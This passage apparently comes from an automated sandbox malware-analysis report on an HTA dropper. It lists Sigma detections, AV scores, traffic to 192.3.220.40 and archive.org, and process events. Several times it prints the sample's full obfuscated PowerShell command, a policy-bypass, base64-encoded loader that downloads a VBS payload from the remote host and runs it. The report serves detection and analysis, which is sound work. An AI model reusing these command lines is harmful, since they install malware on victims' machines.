@({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSA

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , ProcessId: 768, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6720, TargetFilename: C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", CommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgI

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline", ProcessId: 2212, ProcessName: csc.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: na.hta	ReversingLabs: Detection: 28%
Source: na.hta	Virustotal: Detection: 47%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Source:	Binary string: scorlib.pdb) source: powershell.exe, 00000009.00000002.3060308602.0000000007741000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.pdb source: powershell.exe, 00000003.00000002.2186146653.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.3060434950.000000000775C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000009.00000002.3059826365.00000000076FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: powershell.exe, 00000009.00000002.3047716005.0000000003075000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb* source: powershell.exe, 00000009.00000002.3060355000.000000000774B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbP source: powershell.exe, 00000009.00000002.3060355000.000000000774B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdb source: powershell.exe, 00000009.00000002.3059826365.00000000076FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: l\mscorlib.pdb0 source: powershell.exe, 00000009.00000002.3060308602.0000000007741000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.3060434950.000000000775C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.3059826365.00000000076FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000009.00000002.3059826365.00000000076FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.3047716005.0000000003075000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: Joe Sandbox View

IP Address: 207.241.227.242 207.241.227.242

Source: Joe Sandbox View

ASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS

Source: global traffic

HTTP traffic detected: GET /330/verybestthingswesharedfornew.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.220.40Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.220.40

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_02A37A18 URLDownloadToFileW,

3_2_02A37A18

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: ia600102.us.archive.org
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa

Source: powershell.exe, 00000003.00000002.2186146653.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.220.40/330/verybest
Source: powershell.exe, 00000003.00000002.2186146653.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2184430637.0000000002877000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.220.40/330/verybestthingswesharedfornew.tIF
Source: powershell.exe, 00000003.00000002.2184430637.0000000002877000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.220.40/330/verybestthingswesharedfornew.tIFn
Source: powershell.exe, 00000003.00000002.2184430637.0000000002877000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.220.40/330/verybestthingswesharedfornew.tIFn-
Source: powershell.exe, 00000003.00000002.2189731614.0000000006E30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000003.00000002.2188108754.0000000005756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3057710282.0000000006166000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.3049506875.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2186146653.0000000004847000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2186146653.00000000046F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3069398891.0000000004B76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3049506875.0000000005101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2186146653.0000000004847000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.3049506875.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2186146653.00000000046F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3069398891.0000000004B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3069398891.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3049506875.0000000005101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2186146653.0000000004847000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000009.00000002.3057710282.0000000006166000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.3057710282.0000000006166000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.3057710282.0000000006166000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.3049506875.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.3049506875.0000000005628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.3047716005.0000000003075000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ia600102.2o
Source: powershell.exe, 00000009.00000002.3049506875.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia600102.us.archive.org
Source: powershell.exe, 00000007.00000002.3069398891.0000000004E7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia600102.us.archive.org/32/itLR
Source: powershell.exe, 00000009.00000002.3049506875.0000000005620000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3048457813.00000000031A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot
Source: powershell.exe, 00000009.00000002.3049506875.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
Source: powershell.exe, 00000009.00000002.3048457813.00000000031A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/detahnot
Source: powershell.exe, 00000003.00000002.2184430637.00000000027EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/tX3.PowerShell.dllReporting/icrosoft.WindowsErrorRep
Source: powershell.exe, 00000003.00000002.2188108754.0000000005756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3057710282.0000000006166000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57947
Source: unknown	Network traffic detected: HTTP traffic on port 57947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 